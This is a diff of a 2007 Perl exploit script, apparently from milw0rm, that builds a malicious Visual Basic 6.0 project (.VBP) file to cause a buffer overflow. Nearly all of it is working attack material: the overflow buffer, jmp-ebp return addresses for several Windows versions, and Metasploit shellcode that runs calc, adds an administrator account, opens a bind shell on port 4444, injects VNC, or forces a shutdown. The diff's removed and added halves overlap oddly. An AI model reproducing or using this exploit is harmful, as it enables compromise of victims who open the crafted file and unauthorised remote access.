"\x44\x57\x42\x42\x46\x53\x46\x36\x4d\x56\x49\x46\x50\x56\x42\x32". - "\x4b\x36\x4f\x36\x43\x37\x4a\x46\x49\x36\x42\x32\x4f\x42\x41\x34". - "\x46\x54\x46\x34\x42\x32\x48\x52\x48\x52\x42\x52\x50\x36\x45\x46". - "\x46\x57\x42\x42\x4e\x56\x4f\x36\x43\x36\x41\x36\x4e\x46\x47\x56". - "\x44\x37\x4f\x36\x45\x57\x42\x57\x42\x52\x41\x44\x46\x56\x4d\x56". - "\x49\x46\x50\x56\x49\x46\x43\x47\x46\x57\x44\x37\x41\x36\x46\x57". - "\x4f\x46\x44\x37\x43\x37\x42\x32\x46\x43\x46\x36\x4d\x56\x49\x36". - "\x50\x56\x42\x42\x4f\x32\x41\x44\x46\x54\x46\x54\x42\x50\x5a"; - -# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com -$shellc3 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". 
- "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e". - "\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38". - "\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x48\x4e\x37". - "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x58". - "\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x48". - "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c". - "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e". - "\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x48". - "\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54". - "\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x58". - "\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x33\x4b\x4d". - "\x46\x46\x4b\x48\x43\x34\x42\x53\x4b\x58\x42\x54\x4e\x30\x4b\x48". - "\x42\x57\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x50\x50\x45\x4a\x46". - "\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46". - "\x43\x45\x48\x56\x4a\x36\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x37". - "\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e". - "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e". - "\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x36\x44\x50". - "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45". - "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x55\x43\x54". - "\x43\x45\x43\x54\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x31". - "\x4e\x35\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x46\x46\x4a". - "\x4c\x41\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x46\x42\x31". - "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32". - "\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d". 
- "\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d". - "\x42\x45\x46\x45\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x36". - "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x45". - "\x4f\x4f\x42\x4d\x48\x56\x4c\x36\x46\x56\x48\x46\x4a\x36\x43\x46". - "\x4d\x36\x49\x38\x45\x4e\x4c\x46\x42\x35\x49\x45\x49\x32\x4e\x4c". - "\x49\x48\x47\x4e\x4c\x56\x46\x54\x49\x48\x44\x4e\x41\x43\x42\x4c". - "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42". - "\x43\x59\x4d\x38\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36". - "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x54\x4f\x4f". - "\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x35\x41\x45\x41\x55\x4c\x46". - "\x41\x30\x41\x45\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x36". - "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56". - "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f". - "\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d". - "\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x43\x45\x4f\x4f\x48\x4d". - "\x4f\x4f\x42\x4d\x5a"; - -# win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com -$shellc4 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4a\x4e\x48\x55\x42\x50". - "\x42\x30\x42\x30\x43\x55\x45\x35\x48\x45\x47\x45\x4b\x38\x4e\x36". - "\x46\x42\x4a\x31\x4b\x38\x45\x54\x4e\x33\x4b\x48\x46\x55\x45\x30". - "\x4a\x47\x41\x50\x4c\x4e\x4b\x58\x4c\x54\x4a\x31\x4b\x48\x4c\x55". - "\x42\x42\x41\x50\x4b\x4e\x43\x4e\x44\x43\x49\x54\x4b\x58\x46\x33". - "\x4b\x48\x41\x30\x50\x4e\x41\x33\x4f\x4f\x4e\x4f\x41\x43\x42\x4c". 
- "\x4e\x4a\x4a\x53\x42\x4e\x46\x57\x47\x30\x41\x4c\x4f\x4c\x4d\x30". - "\x41\x30\x47\x4c\x4b\x4e\x44\x4f\x4b\x33\x4e\x47\x46\x42\x46\x51". - "\x45\x37\x41\x4e\x4b\x38\x4c\x35\x46\x52\x41\x30\x4b\x4e\x48\x56". - "\x4b\x58\x4e\x50\x4b\x54\x4b\x48\x4c\x55\x4e\x51\x41\x30\x4b\x4e". - "\x4b\x58\x46\x30\x4b\x58\x41\x50\x4a\x4e\x4b\x4e\x44\x50\x41\x43". - "\x42\x4c\x4f\x35\x50\x35\x4d\x35\x4b\x45\x44\x4c\x4a\x50\x42\x50". - "\x50\x55\x4c\x36\x42\x33\x49\x55\x46\x46\x4b\x58\x49\x31\x4b\x38". - "\x4b\x45\x4e\x50\x4b\x38\x4b\x35\x4e\x31\x4b\x48\x4b\x51\x4b\x58". - "\x4b\x45\x4a\x30\x43\x55\x4a\x56\x50\x38\x50\x34\x50\x50\x4e\x4e". - "\x4f\x4f\x48\x4d\x49\x48\x47\x4c\x41\x58\x4e\x4e\x42\x50\x41\x50". - "\x42\x50\x42\x30\x47\x45\x48\x55\x43\x45\x49\x38\x45\x4e\x4a\x4e". - "\x47\x52\x42\x30\x42\x30\x42\x30\x42\x59\x41\x50\x42\x30\x42\x50". - "\x48\x4b\x49\x51\x4a\x51\x47\x4e\x46\x4a\x49\x31\x42\x47\x49\x4e". - "\x45\x4e\x49\x54\x48\x58\x49\x54\x46\x4a\x4c\x51\x42\x37\x47\x4c". - "\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x49\x4d\x49\x50\x45\x4f\x4d\x4a". - "\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x43\x47\x45\x43\x35\x44\x33\x4f\x45". - "\x43\x33\x44\x43\x42\x30\x4b\x45\x4d\x38\x4b\x34\x42\x42\x41\x55". - "\x4f\x4f\x47\x4d\x49\x58\x4f\x4d\x49\x38\x43\x4c\x4d\x58\x45\x47". - "\x46\x41\x4c\x36\x47\x30\x49\x45\x41\x35\x43\x45\x4f\x4f\x46\x43". - "\x4f\x38\x4f\x4f\x45\x35\x46\x50\x49\x35\x49\x58\x46\x50\x50\x48". - "\x44\x4e\x44\x4f\x4b\x32\x47\x52\x46\x35\x4f\x4f\x47\x43\x4f\x4f". - "\x45\x35\x42\x43\x41\x53\x42\x4c\x42\x45\x42\x35\x42\x35\x42\x55". - "\x42\x54\x42\x55\x42\x44\x42\x35\x4f\x4f\x45\x45\x4e\x32\x49\x48". - "\x47\x4c\x41\x53\x4b\x4d\x43\x45\x43\x45\x4a\x46\x44\x30\x42\x50". - "\x41\x31\x4e\x55\x49\x48\x42\x4e\x4c\x36\x42\x31\x42\x35\x47\x55". - "\x4f\x4f\x45\x35\x46\x32\x43\x55\x47\x45\x4f\x4f\x45\x45\x4a\x32". - "\x43\x55\x46\x35\x47\x45\x4f\x4f\x45\x55\x42\x32\x49\x48\x47\x4c". - "\x41\x58\x4e\x4e\x42\x50\x42\x31\x42\x50\x42\x50\x49\x58\x43\x4e". 
- "\x4c\x46\x42\x50\x4a\x46\x42\x30\x42\x51\x42\x30\x42\x30\x43\x35". - "\x47\x45\x4f\x4f\x45\x35\x4a\x31\x41\x58\x4e\x4e\x42\x30\x46\x30". - "\x42\x30\x42\x30\x4f\x4f\x43\x4d\x5a"; - -# win32_exec - EXITFUNC=seh CMD=shutdown -c "HAI VEn0m pwn3d j00r b0x0r wif k0sh1 u b1tch" Size=451 Encoder=PexAlphaNum http://metasploit.com -$shellc5 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". - "\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x43\x4b\x38\x4e\x47". - "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x48". - "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x48". - "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c". - "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". - "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x38". - "\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34". - "\x4b\x38\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x48". - "\x41\x50\x4b\x4e\x49\x48\x4e\x35\x46\x32\x46\x50\x43\x4c\x41\x43". - "\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x43\x45\x58\x42\x4c\x4a\x37". - "\x4e\x50\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x57\x4e\x51\x4d\x4a". - "\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b". - "\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x45\x41\x53". - "\x48\x4f\x42\x36\x48\x35\x49\x48\x4a\x4f\x43\x58\x42\x4c\x4b\x37". - "\x42\x45\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x56\x4a\x39". - "\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x37\x4a\x56". - "\x45\x47\x46\x37\x46\x46\x4f\x36\x47\x37\x50\x46\x42\x42\x4d\x42". - "\x43\x36\x42\x42\x44\x42\x4a\x34\x41\x54\x49\x34\x42\x42\x48\x35". 
- "\x45\x34\x50\x56\x42\x33\x4d\x56\x42\x52\x42\x57\x47\x57\x50\x56".
- "\x43\x33\x46\x36\x42\x32\x4c\x46\x42\x33\x42\x33\x44\x37\x42\x32".
- "\x44\x46\x42\x53\x4a\x57\x42\x33\x44\x47\x42\x52\x47\x47\x49\x56".
- "\x48\x46\x42\x52\x4b\x56\x42\x33\x43\x57\x4a\x56\x41\x53\x42\x32".
- "\x45\x37\x42\x32\x44\x56\x41\x43\x46\x37\x43\x46\x4a\x56\x44\x32".
- "\x42\x30\x5a";
-
-$endQuote = "\x22";
-
-$i = $ARGV[0];
-
-
-if ($i==1){
-print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc1$endQuote$koshi";
-exit;
-}
-
-
-if ($i==2){
-print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc2$endQuote$koshi";
-exit;
-}
-
-
-if ($i==3){
-print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc3$endQuote$koshi";
-exit;
-}
-
-
-if ($i==4){
-print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc4$endQuote$koshi";
-exit;
-}
-
-
-if ($i==5){
-print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc5$endQuote$koshi";
-exit;
-}
-
-
-print "\n";
-print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
-print " +++ +++\n";
-print " +++ +++\n";
-print " +++ Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec +++\n";
-print " +++ Written By Koshi +++\n";
-print " +++ Greets: Rima my baby! Draven, thanks for helping. +++\n";
-print " +++ +++\n";
-print " +++ Usage Ex.: ./vb6.pl 1 >>Project1.vbp +++\n";
-print " +++ +++\n";
-print " +++ Options: +++\n";
-print " +++ 1 - win32_exec CALC.EXE +++\n";
-print " +++ 2 - win32_adduser Pass=4dmin User=koshi +++\n";
-print " +++ 3 - win32_bind Port 4444 +++\n";
-print " +++ 4 - win32_bind_vncinject Port 5900 +++\n";
-print " +++ 5 - win32_exec shutdown -c \x22HAI VEn0m pw..
+++\n"; -print " +++ +++\n"; -print " +++ +++\n"; -print " +++ Notes: Ship final .VBP file with a .FRM file to avoid +++\n"; -print " +++ warnings in Visual Basic 6.0 +++\n"; -print " +++ +++\n"; -print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; - - - - - - -exit; - - -#EOF - -# milw0rm.com [2007-09-04] +#!/usr/bin/perl +#' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++ +#' ++++++++++++++++++++++++++++++++++++++++++++++++++++++ +#'++ Author: Koshi + +#'++ Email: heykoshi at gmail dot com + +#'++ Application: Microsoft Visual Basic 6.0 + +#'++ + +#'++ Tested on Microsoft Windows XP Home Edition SP2 + +#'++ Patched & Updated + +#'++ + +#'++ The vulnerable buffer exsists in the .VBP files of + +#'++ Visual Basic projects. You can jump directly to + +#'++ the shellcode, or jump to it via EBP. + +#'++ + +#'++ There is NO restriction of shellcode size either. + +#'++ + +#'++ Gr33tz: Rima my baby who I love and adore, Draven + +#'++ for pointing me in the right direction, as always. + +#'++ + +#'++ + +#'++ This exploit is for educational use only, blah. + +#'++ + +#'++ + +#'+++++++++++++++++++++++++++++++++++++++++++++++++++++++ +#'+++++++++++++++++++++++++++++++++++++++++++++++++++++ +# +# Ex. of Usage: +# perl vb6.pl 1 >>Project.vbp +# +# +$begin0 = "\x54\x79\x70\x65\x3D\x45\x78\x65\x0D\x0A\x46\x6F\x72\x6D". + "\x3D\x46\x6F\x72\x6D\x31\x2E\x66\x72\x6D\x0D\x0A"; + +$begin1 = "\x52\x65\x66\x65\x72\x65\x6E\x63\x65\x3D". + "\x2A\x5C\x47\x7B\x30\x30\x30\x32\x30\x34\x33\x30\x2D\x30". + "\x30\x30\x30\x2D\x30\x30\x30\x30\x2D\x43\x30\x30\x30\x2D". + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x36\x7D\x23". + "\x32\x2E\x30\x23\x30\x23\x2E\x2E\x5C\x2E\x2E\x5C\x2E\x2E". + "\x5C\x2E\x2E\x5C\x2E\x2E\x5C\x57\x49\x4E\x44\x4F\x57\x53". + "\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x73\x74\x64\x6F". + "\x6C\x65\x32\x2E\x74\x6C\x62\x23\x4F\x4C\x45\x20\x41\x75". 
+ "\x74\x6F\x6D\x61\x74\x69\x6F\x6E"; + +$begin2 = "\x0D\x0A\x53\x74\x61\x72\x74\x75\x70\x3D\x22\x46\x6F\x72\x6D\x31\x22\x0D\x0A". + "\x43\x6F\x6D\x6D\x61\x6E\x64\x33\x32\x3D\x22\x22"; + +$BuffOf = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". 
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+ "\x41\x41\x41\x41";
+
+$codeAddr = "\x83\x25\x40\x01";
+# You can most likely use a call or a push, you could probably use them from kernel32.dll too.
+#* ntdll.dll - 0x7C923DA3 jmp Ebp **** Is the one i have used in this example.
+# 0x77f6d42f jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32)
+# 0x77f7d9b6 jmp ebp ntdll.dll (English / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
+# 0x77f8c449 jmp ebp ntdll.dll (English / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
+# 0x77faa6ce jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32)
+# 0x7c85eb73 jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
+# 0x7c8839ed jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
+#*0x7c923da3 jmp ebp ntdll.dll (English / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32)
+# 0x77f8c449 jmp ebp ntdll.dll (French / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
+# 0x77f6d9b6 jmp ebp ntdll.dll (German / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
+# 0x7c933da3 jmp ebp ntdll.dll (German / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32)
+# 0x77f5d42f jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions
+# 0x77f6d9b6 jmp ebp ntdll.dll (Italian / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)
+# 0x77f8c449 jmp ebp ntdll.dll (Italian / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
+# 0x77f9a6ce jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions
+# 0x7c96eb73 jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions
+# 0x7c9939ed jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions
+# ...backwards..if you don't know why,
then gtfo. +$jmpEbp = "\xA3\x3D\x92\x7C"; +$fourSkin = "\x44\x44\x44\x44"; + + +$begin3 = "\x0D\x0A\x4E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x6A\x65\x63". + "\x74\x31\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". + "\x41\x41\x41\x41\x41\x41\x41\x41"; + +$koshi = "\x0D\x0A\x48\x65\x6C\x70\x43\x6F\x6E\x74\x65\x78\x74\x49\x44\x3D\x22\x30\x22\x0D\x0A\x43\x6F\x6D". + "\x70\x61\x74\x69\x62\x6C\x65\x4D\x6F\x64\x65\x3D\x22\x30\x22\x0D\x0A\x4D\x61\x6A\x6F\x72\x56\x65". + "\x72\x3D\x31\x0D\x0A\x4D\x69\x6E\x6F\x72\x56\x65\x72\x3D\x30\x0D\x0A\x52\x65\x76\x69\x73\x69\x6F". + "\x6E\x56\x65\x72\x3D\x30\x0D\x0A\x41\x75\x74\x6F\x49\x6E\x63\x72\x65\x6D\x65\x6E\x74\x56\x65\x72". + "\x3D\x30\x0D\x0A\x53\x65\x72\x76\x65\x72\x53\x75\x70\x70\x6F\x72\x74\x46\x69\x6C\x65\x73\x3D\x30". + "\x0D\x0A\x43\x6F\x6D\x70\x69\x6C\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x4F\x70\x74". + "\x69\x6D\x69\x7A\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x46\x61\x76\x6F\x72\x50\x65". + "\x6E\x74\x69\x75\x6D\x50\x72\x6F\x28\x74\x6D\x29\x3D\x30\x0D\x0A\x43\x6F\x64\x65\x56\x69\x65\x77". + "\x44\x65\x62\x75\x67\x49\x6E\x66\x6F\x3D\x30\x0D\x0A\x4E\x6F\x41\x6C\x69\x61\x73\x69\x6E\x67\x3D". + "\x30\x0D\x0A\x42\x6F\x75\x6E\x64\x73\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x4F\x76\x65\x72\x66\x6C". + "\x6F\x77\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x46\x6C\x50\x6F\x69\x6E\x74\x43\x68\x65\x63\x6B\x3D". + "\x30\x0D\x0A\x46\x44\x49\x56\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x55\x6E\x72\x6F\x75\x6E\x64\x65". + "\x64\x46\x50\x3D\x30\x0D\x0A\x53\x74\x61\x72\x74\x4D\x6F\x64\x65\x3D\x30\x0D\x0A\x55\x6E\x61\x74". + "\x74\x65\x6E\x64\x65\x64\x3D\x30\x0D\x0A\x52\x65\x74\x61\x69\x6E\x65\x64\x3D\x30\x0D\x0A\x54\x68". + "\x72\x65\x61\x64\x50\x65\x72\x4F\x62\x6A\x65\x63\x74\x3D\x30\x0D\x0A\x4D\x61\x78\x4E\x75\x6D\x62". + "\x65\x72\x4F\x66\x54\x68\x72\x65\x61\x64\x73\x3D\x31\x0D\x0A\x0D\x0A\x5B\x4D\x53\x20\x54\x72\x61". + "\x6E\x73\x61\x63\x74\x69\x6F\x6E\x20\x53\x65\x72\x76\x65\x72\x5D\x0D\x0A\x41\x75\x74\x6F\x52\x65". 
+ "\x66\x72\x65\x73\x68\x3D\x31\x0D\x0A"; + +# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com +$shellc1 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". + "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47". + "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38". + "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48". + "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c". + "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". + "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58". + "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44". + "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38". + "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33". + "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47". + "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a". + "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b". + "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33". + "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37". + "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59". + "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56". + "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"; + +# win32_adduser - PASS=koshi EXITFUNC=seh USER=4dmin Size=495 Encoder=PexAlphaNum http://metasploit.com +$shellc2 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". 
